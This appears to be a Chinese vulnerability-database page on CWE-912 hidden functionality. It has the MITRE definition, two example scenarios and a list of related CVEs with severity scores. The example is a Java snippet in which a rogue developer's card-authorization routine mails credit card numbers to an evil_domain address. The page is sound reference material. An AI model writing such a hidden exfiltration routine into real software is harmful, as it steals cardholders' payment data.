目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1359 元

100%

CWE-912 隐藏功能 类漏洞列表 75

CWE-912 隐藏功能 类弱点 75 条 CVE 漏洞汇总,含 AI 中文分析。

CWE-912 指隐藏功能漏洞,即软件包含未文档化、非规范且不易察觉的功能。攻击者常利用这些隐蔽入口执行未授权操作或植入恶意代码。开发者应通过严格的代码审查、最小权限原则及自动化测试,确保所有功能均符合设计规范并公开透明,从而消除潜在的安全隐患。

MITRE CWE 官方描述
CWE:CWE-912 Hidden Functionality(隐藏功能) 英文:该产品包含未记录、不属于规范一部分,且无法通过产品用户或管理员显而易见的接口或命令序列访问的功能。 Hidden Functionality(隐藏功能)可以采取多种形式,例如故意恶意的代码、包含游戏等额外功能的“Easter Eggs”(彩蛋)、为降低维护或支持成本而设计的开发者友好型快捷方式(如硬编码账户)等。从安全角度来看,即使该功能并非故意恶意或具有破坏性,它仍会增加产品的攻击面(attack surface),并暴露出超出预期功能所暴露的额外弱点。即使其不易访问,Hidden Functionality(隐藏功能)仍可能被用于修改应用程序控制流的攻击中。
常见影响 (1)
Other, Integrity Varies by Context, Alter Execution Logic
缓解措施 (1)
Installation Always verify the integrity of the product that is being installed.
代码示例 (2)
In the example below, a malicous developer has injected code to send credit card numbers to the developer's own email address.
boolean authorizeCard(String ccn) { // Authorize credit card. ... mailCardNumber(ccn, "evil_developer@evil_domain.com"); }
Bad · Java
Consider a device that comes with various security measures, such as secure boot. The secure-boot process performs firmware-integrity verification at boot time, and this code is stored in a separate SPI-flash device. However, this code contains undocumented "special access features" intended to be used only for performing failure analysis and intended to only be unlocked by the device designer.
Attackers dump the code from the device and then perform reverse engineering to analyze the code. The undocumented, special-access features are identified, and attackers can activate them by sending specific commands via UART before secure-boot phase completes. Using these hidden features, attackers can perform reads and writes to memory via the UART interface. At runtime, the attackers can also execute arbitrary code and dump the entire memory contents.
Bad · Other
CVE ID 标题 CVSS 风险等级 Published
CVE-2025-48416 eCharge Hardy Barth cPH2和eCharge Hardy Barth cPP2 安全漏洞 — cPH2 / cPP2 charging stations 9.8AI Critical AI 2025-05-21
CVE-2025-47729 TeleMessage archiving backend 安全漏洞 — archiving backend 1.9 Low 2025-05-08
CVE-2025-32370 Kentico Xperience 安全漏洞 — Xperience 7.2 High 2025-04-06
CVE-2025-2894 Unitree Go 1 安全漏洞 — Go1 6.6 Medium 2025-03-28
CVE-2025-27840 Espressif ESP32 安全漏洞 — ESP32 6.8 Medium 2025-03-08
CVE-2025-1204 Contec Health CMS8000 Patient Monitor 安全漏洞 — CMS8000 Patient Monitor 7.7 - 2025-02-25
CVE-2025-0675 Elber Communications Equipment 安全漏洞 — Signum DVB-S/S2 IRD 7.5 High 2025-02-06
CVE-2025-0626 Contec Health CMS8000 Patient Monitor 安全漏洞 — CMS8000 Patient Monitor 7.5 High 2025-01-30
CVE-2024-39754 WAVLINK AC3000 安全漏洞 — Wavlink AC3000 10.0 Critical 2025-01-14
CVE-2024-13062 ASUS AiCloud 安全漏洞 — Router 7.2 High 2025-01-02
CVE-2024-10773 SICK多款产品 安全漏洞 — SICK InspectorP61x 9.0 Critical 2024-12-06
CVE-2024-45697 D-Link DIR-X4860 安全漏洞 — DIR-X4860 A1 9.8 Critical 2024-09-16
CVE-2024-45696 D-Link DIR-X4860 安全漏洞 — DIR-X4860 A1 8.8 High 2024-09-16
CVE-2024-37994 Siemens SIMATIC 安全漏洞 — SIMATIC Reader RF610R CMIIT 4.3 Medium 2024-09-10
CVE-2024-37990 Siemens SIMATIC 安全漏洞 — SIMATIC Reader RF610R CMIIT 6.5 Medium 2024-09-10
CVE-2024-20439 Cisco Smart Licensing Utility 安全漏洞 — Cisco Smart License Utility 9.8 Critical 2024-09-04
CVE-2024-5633 Longse LBH30FE200W 安全漏洞 — LBH30FE200W 8.8AI High AI 2024-07-09
CVE-2024-6045 D-Link E Series 安全漏洞 — G403 8.8 High 2024-06-17
CVE-2024-33583 Siemens 多款产品 安全漏洞 — SIMATIC RTLS Locating Manager 3.3 Low 2024-05-14
CVE-2024-3016 NEC Platforms DT900 Series 安全漏洞 — ITK-6DGS-1(BK) TEL 6.5 - 2024-05-09
CVE-2024-28011 NEC Corporation Aterm 安全漏洞 — WG1800HP4 8.1AI High AI 2024-03-28
CVE-2024-22044 Siemens SENTRON 3KC ATC6 Expansion Module Ethernet 安全漏洞 — SENTRON 3KC ATC6 Expansion Module Ethernet 7.5 High 2024-03-12
CVE-2023-42134 PAX Technology A920 安全漏洞 — POS terminals 6.8 Medium 2024-01-15
CVE-2023-4467 Poly Trio 安全漏洞 — Trio 8800 6.2 Medium 2023-12-29
CVE-2023-6614 typecho 安全漏洞 — Typecho 2.7 Low 2023-12-08
CVE-2023-25183 Snap One OvrC Pro 安全漏洞 — OvrC Cloud 8.3 High 2023-05-22
CVE-2022-38452 NETGEAR RBR750 安全漏洞 — Orbi Router RBR750 7.2 High 2023-03-21
CVE-2022-36429 NETGEAR Orbi Satellite RBS750 安全漏洞 — Orbi Satellite RBS750 7.2 High 2023-03-21
CVE-2021-36403 Moodle 输入验证错误漏洞 — Moodle 4.3 - 2023-03-06
CVE-2022-3843 WAGO 安全漏洞 — Unmanaged Switch 852-111/000-001 9.1 Critical 2023-02-16

CWE-912(隐藏功能) 是常见的弱点类别,本平台收录该类弱点关联的 75 条 CVE 漏洞。